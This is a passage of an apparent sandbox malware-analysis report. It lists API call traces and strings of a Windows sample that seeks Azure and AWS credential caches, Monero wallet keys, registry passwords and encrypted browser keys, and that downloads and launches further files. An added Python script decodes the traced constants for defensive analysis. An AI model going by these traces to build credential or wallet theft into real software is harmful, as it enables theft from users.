                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                            • Instruction ID: b8eda88b2d5f85d38733ddd5ca4848b362f4c748ae964b407b8f8b58f20f80f7
                            • Opcode Fuzzy Hash: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                            • Instruction Fuzzy Hash: 2381F97191051CABEB29DB60CD95FEAB7B8FF58704F008298E109A6140DF716A89CFE1
                            APIs
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00394DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00394DCD
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                              • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                            • lstrcat.KERNEL32(?,00000000), ref: 00394E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00394E59
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                              • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                              • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00394EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00394EE5
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949B0
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A08D2), ref: 003949C5
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949E2
                              • Part of subcall function 00394910: PathMatchSpecA.SHLWAPI(?,?), ref: 00394A1E
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,0115E858), ref: 00394A4A
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FF8), ref: 00394A5C
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A70
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FFC), ref: 00394A82
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A96
                              • Part of subcall function 00394910: CopyFileA.KERNEL32(?,?,00000001), ref: 00394AAC
                              • Part of subcall function 00394910: DeleteFileA.KERNEL32(?), ref: 00394B31
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                            • Instruction ID: 493463e42798e4a39787ae4a3b0a2ce115735d518e0fe9308e637d7a47357c43
                            • Opcode Fuzzy Hash: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                            • Instruction Fuzzy Hash: C241D6BA95030867DB15F760EC47FEE3738AB65704F004494B245AA0C1FEB45BC98B92
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0039906C
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                            • Instruction ID: b404a8fc6ae3ca88664d2b0bbf89bb520614bb79288eb632cfdf71adab80f500
                            • Opcode Fuzzy Hash: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                            • Instruction Fuzzy Hash: A371DA75910608AFDB04EBE4DC89FEEBBB8FB58704F108508F516AB290DB34A945DB61
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003931C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0039335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003934EA
                            Strings
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                            • Instruction ID: ac345bdbf4afad4efea6b61427706070990cdd9e31017373fb5333ca9d24c139
                            • Opcode Fuzzy Hash: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                            • Instruction Fuzzy Hash: 0C12FF718145189ADF1AFBA0DC92FEEB778AF14300F504259F5066A191EF342B4ADFE2
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                              • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,0115E828), ref: 00386303
                              • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                              • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00386385
                              • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                              • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                            • lstrlen.KERNEL32(00000000), ref: 0039532F
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                            • lstrlen.KERNEL32(00000000), ref: 00395383
                            • lstrlen.KERNEL32(00000000), ref: 003953AE
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 57cc4209df33fa1a2188bac05d16a27fd74fa5ff870aa97dbc83d75b7ad8c317
                            • Instruction ID: 946790896487185e6f15ae44a1d226a8db9bcb1b36d22a1a24f202893c3e645a
                            • Opcode Fuzzy Hash: 57cc4209df33fa1a2188bac05d16a27fd74fa5ff870aa97dbc83d75b7ad8c317
                            • Instruction Fuzzy Hash: BA510D309246489BDF16FFA0CD96AED7B79EF11300F504118F40A6E592EF346B46DBA2
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 48e6223d8d50adad844d654d29662f8da319f12b93baaa18060ed6240b01945c
                            • Instruction ID: b316746347b0bb88d032974e7f72cb4a15a3938602319e31ddb37e3f05f3254a
                            • Opcode Fuzzy Hash: 48e6223d8d50adad844d654d29662f8da319f12b93baaa18060ed6240b01945c
                            • Instruction Fuzzy Hash: DAC196B690021D9BCF15EF60DC89FEA7778BF64304F004599F50AAB241DB70AA85DF91
                            APIs
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003942EC
                            • lstrcat.KERNEL32(?,0115E538), ref: 0039430B
                            • lstrcat.KERNEL32(?,?), ref: 0039431F
                            • lstrcat.KERNEL32(?,0115CE68), ref: 00394333
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                              • Part of subcall function 00389CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 003993C0: GlobalAlloc.KERNEL32(00000000,003943DD,003943DD), ref: 003993D3
                            • StrStrA.SHLWAPI(?,0115E568), ref: 003943F3
                            • GlobalFree.KERNEL32(?), ref: 00394512
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                              • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                              • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 003944A3
                            • StrCmpCA.SHLWAPI(?,003A08D1), ref: 003944C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003944D2
                            • lstrcat.KERNEL32(00000000,?), ref: 003944E5
                            • lstrcat.KERNEL32(00000000,003A0FB8), ref: 003944F4
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: e7badd5eeec81888088292cec87cd7e2c9e16939db36537792e6be9be0950826
                            • Instruction ID: caa7deb26f024e3ef9a8bfa4c936c86241f4adb1f111ae8f8dbaa8508ed12435
                            • Opcode Fuzzy Hash: e7badd5eeec81888088292cec87cd7e2c9e16939db36537792e6be9be0950826
                            • Instruction Fuzzy Hash: 3B7155B6900608ABCF15FBE0DC89FEE777DAB98304F044598F605A7181EA35DB49CB91
                            APIs
                              • Part of subcall function 003812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                              • Part of subcall function 003812A0: RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                              • Part of subcall function 003812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                              • Part of subcall function 003812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                              • Part of subcall function 003812A0: RegCloseKey.ADVAPI32(?), ref: 003812FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0038134F
                            • lstrlen.KERNEL32(?), ref: 0038135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00381377
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00381465
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 003814EF
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: a28a98fab51c120d0bb6d6474c73f802720236e185eae1e862b72be1392b1f58
                            • Instruction ID: 858bd698dbee9c31bb1f8e053602318171c75d662e6f0fffd4e0cf4a5ef24c80
                            • Opcode Fuzzy Hash: a28a98fab51c120d0bb6d6474c73f802720236e185eae1e862b72be1392b1f58
                            • Instruction Fuzzy Hash: 175132B19506195BCF16FB60DC92FED777CAF54300F4042D8B60AA6081EF706B89CBA6
                            APIs
                              • Part of subcall function 003872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                              • Part of subcall function 003872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                              • Part of subcall function 003872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                              • Part of subcall function 003872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                              • Part of subcall function 003872D0: HeapFree.KERNEL32(00000000), ref: 00387459
                            • lstrcat.KERNEL32(00000000,003A17FC), ref: 00387606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00387648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0038765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0038768F
                            • lstrcat.KERNEL32(00000000,003A1804), ref: 003876A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003876D3
                            • lstrcat.KERNEL32(00000000,003A1808), ref: 003876ED
                            • task.LIBCPMTD ref: 003876FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                            • Instruction ID: d3221e06edda73b4964fd788a0862bea70589f4d1d9d41fe5f51bad368f52e9f
                            • Opcode Fuzzy Hash: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                            • Instruction Fuzzy Hash: 7F312972D00609DFCB06FBA4DC99DEE7B79AB54305B244158F102AB290DB34A94ADB61
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0115E2F8,00000000,?,003A0E2C,00000000,?,00000000), ref: 00398130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00398137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00398158
                            • __aulldiv.LIBCMT ref: 00398172
                            • __aulldiv.LIBCMT ref: 00398180
                            • wsprintfA.USER32 ref: 003981AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                            • Instruction ID: 8d4a74a3f157d875425abb4447cfe267e8b7958d743c0927800fe4e7f0ed4069
                            • Opcode Fuzzy Hash: c380bf1fe0afbb89a1ab17316eba0950e6d505a3d436a8065cbeeefcb8603aef
                            • Instruction Fuzzy Hash: AF211AB1E44218ABDF00DFD4DD4AFAEBBB8FB45B14F104609F605BB280D77869058BA5
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • InternetOpenA.WININET(003A0DF7,00000001,00000000,00000000,00000000), ref: 0038610F
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 00386147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0038618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003861B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 003861DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00386249
                            • InternetCloseHandle.WININET(?), ref: 00386253
                            • InternetCloseHandle.WININET(00000000), ref: 00386260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                            • Instruction ID: 801508d4c17982154f4783e8c7ae85dd935bcfa1ea37aada6fe931c589e4242f
                            • Opcode Fuzzy Hash: 76bf57684d7b4d96e1615973c33085db935b7a9e09a74d9004dbeaa1519d7f5a
                            • Instruction Fuzzy Hash: B35190B1900718AFDF21EF60CC4ABEE77B8FB44305F0085D8A605AB181DB746A89DF95
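                             Argument decoding for the listings above. The values the report prints are the raw stack arguments at the call site (a ? marks one the plugin could not resolve), so reading them needs the SDK constants: at 003861B3 the output file is opened with GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL, and InternetReadFile fills a 0x400-byte buffer that WriteFile copies out, which is a download-to-disk routine. In the helper at 003899C0, used by the function carrying the \Monero\wallet.keys strings, CreateFileA uses GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING and the buffer comes from LocalAlloc(LPTR). The RegOpenKeyExA calls at 0038733A and 003976DD open HKEY_CURRENT_USER with KEY_READ (00020019) and HKEY_LOCAL_MACHINE with KEY_READ|KEY_WOW64_64KEY (00020119). The InternetOpenUrlA flags 00000100 and 04000100 are INTERNET_FLAG_PRAGMA_NOCACHE and INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE, and the in-memory fetch at 00384FCA first allocates 05F5E0FF (99,999,999) bytes for the response. The Python below is an added example and not part of the Joe Sandbox report or of the sample: it parses lines in the format of these APIs lists, decodes those constants, and applies a download-to-disk heuristic of my own. The constant names come from the Windows SDK headers; the embedded trace is copied from this page.

```python
import re
from typing import Dict, List, Optional

# Well-known Windows SDK constants for the calls that appear in this report.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
             0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
SAM = {0xF003F: "KEY_ALL_ACCESS", 0x20019: "KEY_READ", 0x20006: "KEY_WRITE",
       0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY"}
INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x00800000: "INTERNET_FLAG_SECURE", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
             3: "INTERNET_OPEN_TYPE_PROXY"}

# One line of a Joe Sandbox "APIs" list, with or without the "Part of subcall function" prefix.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Lines copied from this report's APIs lists (download-to-disk function, wallet.keys
# read helper, the two RegOpenKeyExA sites and the in-memory download function).
TRACE = """\
• InternetOpenA.WININET(003A0DF7,00000001,00000000,00000000,00000000), ref: 0038610F
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0038618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003861B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 003861DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038620A
  • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
  • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
• RegOpenKeyExA.ADVAPI32(80000002,0114C0A8,00000000,00020119,00000000), ref: 003976DD
• InternetOpenA.WININET(003A0DDF,00000000,00000000,00000000,00000000), ref: 00384FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00385011
"""


def flag_names(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as SDK names; composite masks (KEY_READ) are matched before single bits."""
    names, remaining = [], value & 0xFFFFFFFF
    for mask, name in sorted(table.items(), key=lambda kv: -bin(kv[0]).count("1")):
        if remaining & mask == mask:
            names.append(name)
            remaining &= ~mask
    if remaining:
        names.append(hex(remaining))  # bits we have no name for stay visible instead of being dropped
    return "|".join(names) or "0"


def decode_args(api: str, args: List[object]) -> Dict[str, str]:
    """Decode the arguments whose meaning is fixed by the SDK for the calls seen in this report."""
    def num(i: int) -> Optional[int]:
        return args[i] if i < len(args) and isinstance(args[i], int) else None
    d: Dict[str, str] = {}
    if api.startswith("CreateFile"):
        for i, key, table in ((1, "access", GENERIC), (2, "share", SHARE), (5, "attributes", FILE_ATTR)):
            if num(i) is not None:
                d[key] = flag_names(num(i), table)
        if num(4) is not None:
            d["disposition"] = DISPOSITION.get(num(4), hex(num(4)))
    elif api.startswith("RegOpenKeyEx"):
        if num(0) is not None:
            d["hkey"] = HKEY.get(num(0), hex(num(0)))  # non-root value: a handle from an earlier open
        if num(3) is not None:
            d["sam"] = flag_names(num(3), SAM)
    elif api.startswith("InternetOpenUrl"):
        if num(4) is not None:
            d["flags"] = flag_names(num(4), INET_FLAGS)
    elif api.startswith("InternetOpen"):
        if num(1) is not None:
            d["access_type"] = OPEN_TYPE.get(num(1), hex(num(1)))
    elif api == "LocalAlloc" and num(0) == 0x40:
        d["flags"] = "LPTR (LMEM_FIXED|LMEM_ZEROINIT)"
    return d


def decode_line(line: str) -> Optional[dict]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") is not None else []
    args = [int(a, 16) if HEX_RE.match(a) else a for a in raw]  # "?" and string literals stay as text
    return {"api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
            "sub": m.group("sub"), "args": args, "decoded": decode_args(m.group("api"), args)}


def decode_trace(text: str) -> List[dict]:
    return [c for c in (decode_line(line) for line in text.splitlines()) if c]


def is_download_to_disk(calls: List[dict]) -> bool:
    """Heuristic: a writable CreateFile plus InternetReadFile feeding WriteFile in one listing."""
    opens_for_write = any(c["api"].startswith("CreateFile")
                          and "GENERIC_WRITE" in c["decoded"].get("access", "")
                          and c["decoded"].get("disposition") in ("CREATE_NEW", "CREATE_ALWAYS", "OPEN_ALWAYS")
                          for c in calls)
    apis = {c["api"] for c in calls}
    return opens_for_write and "InternetReadFile" in apis and "WriteFile" in apis


if __name__ == "__main__":
    calls = decode_trace(TRACE)
    for c in calls:
        print(f'{c["ref"]} {c["api"]:<18} {c["decoded"]}')
    print("download-to-disk:", is_download_to_disk(calls))
```

                             Feed it the APIs list of any function block on this page. Unresolved ? arguments and string literals are kept as text, and access-mask bits without a name are printed in hex rather than dropped, so an unexpected mask remains visible in the output.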
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                            • HeapFree.KERNEL32(00000000), ref: 00387459
                            • task.LIBCPMTD ref: 00387555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                            • Instruction ID: 0257cf703ac0bb36b62e345ead26a3c03a56f76d9a1a426b4b620f5f404b36b8
                            • Opcode Fuzzy Hash: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                            • Instruction Fuzzy Hash: 16613BB580426C9BDB25EB50CC45FDAB7B9FF44304F1081E9E649AA141DBB09BC9CFA1
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0038BC9F
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0038BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0038BDA5
